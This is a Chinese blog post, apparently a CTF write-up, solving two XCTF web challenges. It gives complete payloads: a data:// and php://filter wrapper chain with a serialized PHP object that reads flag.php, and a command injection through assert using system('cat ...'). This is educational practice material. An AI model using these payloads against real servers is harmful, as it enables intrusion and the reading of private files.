ctf练习-12

最新推荐文章于 2023-05-21 17:59:32 发布
最新推荐文章于 2023-05-21 17:59:32 发布
阅读量212 收藏
点赞数
分类专栏: ctf-WP 文章标签: php linux web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46743327/article/details/114107261
版权 
又是好久一更。。。假期事有点多

nizhuansiwei[来自攻防世界]

在这里插入图片描述

test的内容可以通过data伪协议
下面file用file伪协议可以读取useless.php的内容

?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

伪协议读取useless.php的源码

在这里插入图片描述
因为上一个文件反序列化之后有个echo可以触发__tostring()
所以我们需要构造序列化之后的内容,使其file=‘flag.php’

在这里插入图片描述
最后payload

http://111.200.241.244:47531/?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}

mfw

提示很明显有git泄露

在这里插入图片描述

在这里插入图片描述
闭合strpos,利用命令执行。

?page=’.system(“cat templates/flag.php”).’
得到flag。

有一说一。。。assert对代码格式的要求真的是。。。低到离谱
_wand1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF题目合集_网络安全ctf大赛题库,附详细答案
碧海朝天素
04-08 1342
/对字符串进行反转 如果是abc 那么就是 cba。X-Forwarded-For 尝试这个。将1改成2即可绕过wakeup功能。
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
CTF-入门练习
10-30
题目来自于蓝盾服务器,难度适中,适合于练习,需要wp请留言
CTF 题目练习题库
热门推荐
syh_486_007的专栏
06-01 3万+
入门----从基础题目出发(推荐资源): http://ctf.idf.cn !!!首推 idf实验室:题目非常基础,只1个点 www.ichunqiu.com 有线下决赛题目复现 http://oj.xctf.org.cn/xctf 题库网站,历年题,练习场,比较难 www.wechall.net/challs !!!!!!非常入门的国外ctf题库,很多国内都是从这里刷题成长起来的
CTF训练
syh_486_007的专栏
09-03 4195
在线CTF练习平台 发表于 2015 年 3 月 7 日 由 YouMeng 在线的ctf,教学,训练,不关闭。国外 we challenge——–最经典 http://www.wechall.net/西普学院 http://www.simplexue.com/ 有在线视频教程http://ctf.idf.cn/ IDF实验室 CTF训练营 有ctf资料,工具,知识一个在线的ctf
CTF练习
qq_53460654的博客
12-15 4294
端午就该吃粽子 打开环境没有界面 直接目录扫描得到 login.php 访问得到 发现存在文件包含 试试目录跳跃,发现被过滤掉了 那就直接php为协议读源码 http://www.bmzclub.cn:22020/login.php?zhongzi=php://filter/read=convert.base64-encode/resource=index.php 解码得到 <?php error_reporting(0); if (isset($_GET['url'])) {
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-Practice:CTF练习文件回购
04-13
问题1: : 问题2: : 问题3: : 问题4: : 问题5: ://mercury.picoctf.net: 问题6: : 问题7: : 用户名:admin'-密码:密码
ctf-challenges
05-12
ctf-challenges该仓库主要将收集到题目按照一定的分类进行存储,方便练习。对于每一个收集到的题目,请务必有以下基本内容源文件readme.md(writeup与相关必要信息)其它必要文件
ctf练习
dieyoujiu5768的博客
11-04 338
也是刚接触ctf不久,在做题的过程中,也是学到了不少东西。刚开始是从南邮的题目入手的,不过再做过bugku上面的题之后,觉得这上面的更适合新手入门。题的难度与易到难,每道题所需要的知识点也非常清晰。前几天在做 字符?正则?这道题时,对正则略有心得,就想写篇文章,发表一下拙见。毕竟是新手,又是第一次写文章,若是有出错的地方,还请大家多包涵,多指教。 对于正则表达式,只要我们能把这个表达式...
ctf网络安全攻防练习
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
ctf练习
moon__________的博客
10-09 3469
攻防世界WEB-Challenge area -Web php include WEB-Challenge area -Web php include 代码审计可以轻松知道本题考查文件包含并且过滤的php:// 所以我们用data://伪协议来传输数据,成功执行phpinfo() http://111.200.241.244:59922/index.php?page=data://text/plain,<?php phpinfo();?> 接下来我们利用大小写测试服务器操作系统(其实上图已
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 2740
CTF训练,WEB安全,Burpsuite部分
CTF例题:
qq_63489512的博客
05-21 1507
第一次参加类似于ctf的比赛赛前准备,以及赛后对题目的总结
一小白的CTF练习(持续更新~)
qq_68093438的博客
09-28 832
一个小白从0开始学习网安的记录~
网络信息安全攻防学习平台CTF练习-基础篇
weixin_49349476的博客
05-11 2150
网络信息安全攻防学习平台 :http://hackinglab.cn/main.php。
#ctf练习#(四)
vircorns的博客
05-24 192
矛盾 is_numeric检测变量是否为数字或数字字符串 主要是数字字符串,要想到科学计数法
CTF Crypto 入门练习
m0_67837149的博客
08-04 3875
CTF Crypto 入门练习
CTFsql注入练习
最新发布
07-29
回答: CTFsql注入练习题是一种用于训练和测试SQL注入技巧的题目。在这些题目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些题目通常包含了不同的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值